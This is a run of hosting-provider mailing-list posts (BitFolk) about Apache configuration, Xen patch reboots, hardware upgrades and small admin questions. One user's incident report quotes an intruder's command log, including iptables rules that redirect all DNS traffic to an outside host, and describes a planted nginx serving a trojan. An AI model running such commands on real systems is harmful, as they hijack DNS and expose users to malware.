The combination of Wheezy's version 5.4 PHP reaching the end of life
and the hack means I have been looking at having a new Jessie server.
The release notes for Jessie acknowledge that "We do not allow access
to the file system outside /var/www and /usr/share. If you are running
virtual hosts or scripts outside these directories, you need to
whitelist them in your configuration to grant access through HTTP."
Now, I have had virtual hosts in user's directories,
/home/*/public_html so that's me. And...
"You must allow access to your served directory explicity in the
corresponding virtual host, or by allowing access in apache2.conf as
proposed."
I think I have, in both, but everything is still getting served by the
default server. (As opposed to getting permission denied.)
In /etc/apache2.conf:
<Directory /home/username/public_html/>
Options FollowSymLinks
AllowOverride None
Require all granted
</Directory>
In /etc/apache2/sites-enabled (symlinked from sites-available)
<VirtualHost *>
DocumentRoot "/home/username/public_html/test"
ServerName example.co.uk
ServerAlias *.example.co.uk
ErrorLog /home/username/logs/test.example.co.uk.error.log
logFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\"
\"%{User-agent}i\" %T" commontime
CustomLog /home/username/logs/test.example.co.uk.access.log commontime
<Directory "/home/username/public_html/test">
Options FollowSymlinks
Require all granted
</Directory>
</VirtualHost>
What stupid thing am I (not) doing?
Ian
Hi,
There's a serious security bug in the Xen hypervisor currently under
embargo until 29th October.
The following of BitFolk's hosts are affected:
bellini.bitfolk.comdunkel.bitfolk.compresident.bitfolk.comsnaps.bitfolk.comsol.bitfolk.com
Some time before the 29th these hosts are going to require their
hypervisors to be upgraded and that upgrade will require the host to
be rebooted, so all VPSes on those hosts will also be shut down and
booted again.
I've not yet fixed exactly when this will be done. Most likely in
the early hours of the morning UK time across three nights close to
the end of the embargo.
To complicate matters further, as you're probably aware we're at the
moment in the middle of migrating customers to new hardware and
upgrading them in the process:
https://tools.bitfolk.com/wiki/Hardware_refresh,_2015-2016http://lists.bitfolk.com/lurker/message/20150927.060438.69cadb3d.en.html
One new host, snaps, has already been deployed and is now at full
capacity, so I'm in the process of deploying the next one now. That
means that the next one can be patched before customers are put on
it, and so the next batch of upgrades will side-step the need for
this other reboot.
So, if:
- You've already been contacted about migrating+upgrading your VPS
but you have so far chosen not to respond, and
- Your VPS is on one of the above listed hosts
then you may wish to consider going back to that email and agreeing
to the migration+upgrade as soon as possible, as otherwise you are
most likely going to experience some down time for the security
patch and ALSO some down time for your eventual forced
migration+upgrade.
I'll follow up as soon as I can with dates/times the patching and
reboots will take place.
Cheers,
Andy
--
http://bitfolk.com/ -- No-nonsense VPS hosting
_______________________________________________
announce mailing list
announce(a)lists.bitfolk.com
https://lists.bitfolk.com/mailman/listinfo/announce
Earlier this month, a Greek IP address failed to login to five WordPress
sites on two of my servers - not on BitFolk. One attempt each on four
sites, and seven on another spread over several days.
On Tuesday last week, it was blocked for 24 hours by both of them after
five failed attempts to login via ssh.
On Wednesday, it succeeded on one of them. Given the strength of the
password, the fact that it's not used (by me) anywhere else, and the
chance of doing this by random, I would quite like to know *how*.
I did login over ssh that day via my mobile, but there is no sign that
my phone is compromised - I logged into three other servers that day,
and none of them have seen this happen. Similarly, if my PC had an
issue, I would expect the other servers to be affected.
I would be wondering about the other people who know the password for
this one except that if it knew the password, why did the IP address
fail the previous day?
Two other 'not me' IP addresses have also since managed it, most
recently on Sunday.
What I can see that they did was firstly...
netstat -napu
cat /etc/resolv.conf
cat /etc/bind/named.conf.default-zones
ifconfig
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT
--to-destination 176.9.74.8:10054
iptables -t nat -A POSTROUTING -p udp -j MASQUERADE
iptables -t nat -L -v -n
iptables -t nat -L -v -n
ifconfig
iptables -L -v -n -x
iptables -I OUTPUT -p udp --sport 53 -j ACCEPT
iptables -I OUTPUT -p udp --dport 53 -j ACCEPT
iptables -L -v -n -x
exit
netstat -napu
exit
.. which, if I understand it correctly, is redirecting DNS requests to
that IP address (various sites reckon that's a site in Germany,
chipmanuals.com, apparently owned by someone in Tbilisi, Georgia...)
Secondly, on Sunday various files were placed in /tmp/.estbuild
including a copy of nginx.
This seems to have been serving a version of the Dridex trojan in the
form of a Windows .exe file from (domain name)/uniq/* before passing the
request onto Apache to 404 the /uniq/ URLs. Fortunately, because of how
it was set up, only requests to the server's own domain name were
affected and it looks like that only had about three human visitors in
that time, one of whom complained.
Obviously more could have happened - there's nothing else odd in various
log files, but clearly they cannot be completely trusted.
On the plus side, this was the server that was first in my queue to
replace with one running Debian Jessie, and it has been ten years since
anything like this has happened to me,* but grrr...
Ian
* The person who ended up being the boss of a former workplace opened an
executable attachment in an email both 'to' and 'from' them that they
knew they hadn't sent, but they "wanted to know what it was..."
I am on kwak. Just rebooted. After rebooting, system time was
about two hours in the future, until:
Oct 14 15:34:44 <myhost> ntpdate[461]: step time server
131.211.8.244 offset -7049.893933 sec
Is the initial time picked up off the host?
Hi,
I haven't done a security incident posting in a while, but that is
down to me forgetting to do them rather than any lack of them!
On 2nd October a customer's compromised Wordpress install was used
to attempt brute-force logins on another remote site's Wordpress.
This drew an abuse report which is how the original compromise was
discovered.
It's not known at this stage how the customer's Wordpress was
compromised. The site has been disabled.
Cheers,
Andy
About this email:
https://tools.bitfolk.com/wiki/Security_incident_postings
--
http://bitfolk.com/ -- No-nonsense VPS hosting
Hello all.
Just a quick query really. Is it possible to boot Clonezilla or similar
on the VPS via the Xen interface? It's not something I know much about,
but I wanted a complete and definite way of backing up. I can put the
image data to another server somewhere and write to HDD as a complete
offsite backup.
Clonezilla comes as an ISO, which with Grub2 can be booted, but I don't
really want to mess around with Grub too much in case I break it.
If there is a better solution to create a complete bit-level backup,
fire away.
Thanks in advance.
George, M1GEO.
george-smart.co.uk
Hello,
TL;DR:
This email is purely informational and there's no need for you to
take any action as a result of it.
The base VPS memory will go from 480M to 1,024M soon, and the
incremental upgrade will go from 240M to 256M, with the prices
remaining the same for those line items. It will take some time
(months) for this to be phased in. You don't need to do anything at
present.
Not Long Enough, Give Me More Info To Read:
Ideally I wanted to avoid saying anything about this until it had
started affecting csutomers, but I'd already given some time
estimates to a few people ("somewhere around the first week of
July"). Now there's been a few delays and some would be left
wondering what is going on, so I thought I better say something.
Clearly an upgrade of VPS specs has been well overdue for ages. In
June, hardware orders were made and this process is now under way.
It's not quite as simple as just buying "the same, but new". The
current BitFolk customer base is spread across 9 servers, and every
single one of them is basically not upgradeable at this stage. I
don't really want to replace them with 9 new ones, so a little more
scalability is required.
The bottleneck at present is either IOPs or CPU. IOPs is the hardest
one to solve so to increase scalability, new hardware must be
SSD-only. That's obviously really expensive, so this is not
something I want to get wrong.
There was quite a long lead time on the hardware I'd selected. I
felt it was worth the wait because the motherboard and CPU have a
really good bang per Watt factor, and the predominant cost for
BitFolk is power. That's now arrived, is in colo, and is being
worked on, so hopefully won't be as much of an issue in future.
The delaying issue now is software. There's a bunch of changes in
both Debian¹ and Xen² which I need to account for in BitFolk's own
software infrastructure.
Once that's progressed a bit more I will need to start putting
BitFolk's own infrastructure VMs on the new hardware to give things
a bit more of a soak test³. Around that time I will also be talking
to those I have already spoken to about this—and seeking some more
volunteers—to have their VPSes moved to the new hardware. There's
no need to contact me now to volunteer. I have to select the most
suitable customers for this and then ask them.
A key thing I need to discover is when the CPU and IOPs will run
out for this specification. For that reason the initial candidates
will have only the base amount of RAM (1G), so that the maximum
number of them can be packed on, and only the base amount of storage
(10G), again so hopefully that doesn't run out before another limit
is reached.
For some sense of comparison, the 3 busiest current servers look
something like this:
Name | # VPSes | RAM used | Storage used
----------+---------+----------+-------------
bellini | 74 | 47G | 2.71T
president | 60 | 45G | 2.71T
sol | 50 | 47G | 1.69T
The new hardware has 1.6T of usable SSD per box, and I want to fit
more customers on each, so obviously I have to start with low
storage VPSes first if I don't want storage to run out first.
Obviously SSD storage costs vastly more than HDD storage. Not very
many BitFolk customers order more storage, but it is unclear at this
stage if I can continue to offer additional (SSD-backed) storage for
the same price as the current HDD-backed storage. I do not want to
put both HDDs and SSDs into the same hosts, so I want to avoid
selling a mixture. I will know more once I've found out where the
CPU and IOPs limits lie.
The backup storage that is currently sold at the same price as live
storage is going to remain on HDD and so will remain at the same
price as now (or cheaper), whatever the case.
Even after I am satisfied that the setup is working well, and the
limits have been found, still I can't just move absolutely anyone in
any order. The next priority will be to decommission the most
power-hungry hosts. By this stage I will be continually ordering and
commissioning new hardware and then migrating customers to it.
During this time, as hosts are emptied, it will be possible to
increase the RAM of some customers without moving them. Eventually
however it will be necessary for every customer to have their VPS
moved between hosts because existing hardware probably run around 3
to 4 times as power hungry than new hardware that should support more
customers per box.
So, there is no need for you to take any action at this time, other
than to ask any questions you may have. I will be in touch with you
directly once it is time for anything to happen. I just wanted to
let you know what was going on, and to reassure those who I've
already spoken to that I have not forgotten about this! The first
set of hardware is bought already, the money is spent, and having
both new and older hardware live is costing BitFolk even more money,
so it is definitely going ahead. :)
Cheers,
Andy
¹ Debian jessie comes with systemd. I have to make sure I'm
comfortable with this and that other various bits of software are
integrated.
I use Puppet for config management. Debian jessie comes with a
version of puppet client which will not talk to the puppetmaster
that is packaged with Debian wheezy. Upgrading the puppetmaster
may necessitate wide-ranging changes elsewhere.
As an aside, upgrades forced by Puppet are probably in my top 5
annoyances with it and I probably wouldn't use it in a new
development. So I don't need to hear about your Puppet hate. :)
² The major piece of work here is accounting for the removal of
Python code from Xen (guest) config files.
At the moment each VPS has a config file which is actually a
fragment of Python that only has variables in it, with a call to a
Python script at the bottom. That script decides whether to just
boot your VPS, or in fact to boot the rescue VM or to download an
installer kernel/initramfs and boot that.
The ability to do that has now gone away and a guest config file
is now just a set of key/value pairs. This means that the Xen
Shell will need to write a new config file for each command or
change you make, and boot that one.
³ Obviously it's already been punished with memtest86+ and IO
throughput tests. I mean more operational testing.
--
http://bitfolk.com/ -- No-nonsense VPS hosting
Hi All,
Maybe it is me that have missed something (as usual), but it seems
that I have a strange behaviour at (in? on? with?) the vps console. I
can login as usual, and screen is starting up a shell on my vps. But
if I detach the screen process from the console (with C^-a d for
example), I am immediately logged out. At that stage I expected to get
to the xen shell so I could control the state of my vps. But that does
not happen.
Anyone got any ideas as to why this is happening?
Thanks,
__
/ony
Following the recent upgrade and reboot of my Bitfolk server, OpenVPN
had stopped working. (I don't use it very often on that server; hence I
hadn't noticed.)
After some trying, the issue turned out to be that the server had
stopped functioning as a router - I thought I'd share what I did to make
it work, in case others run into the same problem.
I ran
echo 1 > /proc/sys/net/ipv4/ip_forward
modprobe tun
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE
/etc/init.d/openvpn restart
Not sure if all of these were needed - the iptables one definitely was
as that was the one that fixed it.
Is there an easy way to make these changes permanent so that they will
survive a future reboot?
Thanks
Martijn.
Hi all,
Hoping to crowdsource your knowledge.
In Ubuntu/Debian, is it possible to set up the www-data user with SSH
access (for development purposes; read/write to the web server document
root) but not "shell access" otherwise?
The SSH will be pub-key only, but I already know how to do such things (to
avoid obvious "do it key only" suggestions).
Kind regards
Murray Crane